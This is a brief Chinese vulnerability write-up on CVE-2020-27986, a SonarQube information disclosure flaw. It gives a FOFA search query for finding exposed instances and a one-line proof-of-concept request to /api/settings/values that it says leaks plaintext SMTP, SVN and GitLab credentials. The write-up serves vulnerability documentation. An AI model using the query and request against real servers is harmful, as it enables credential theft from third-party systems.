SonarQube_api_信息泄露漏洞_CVE-2020-27986

# SonarQube api 信息泄露漏洞 CVE-2020-27986

## 漏洞描述

SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息

## 漏洞影响

> [!NOTE]
>
> SonarQube

## FOFA

> [!NOTE]
>
> app=”sonarQube-代码管理”

## 漏洞复现

主页如下

![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/1.png)

漏洞POC

“`
http://xxx.xxx.xxx.xxx/api/settings/values
“`

![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/2.png)

可泄露的为:明文SMTP、SVN和Gitlab等敏感信息

![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/3.png)

## Goby & POC

> [!NOTE]
>
> SonarQube api Information leakage

![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/4.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容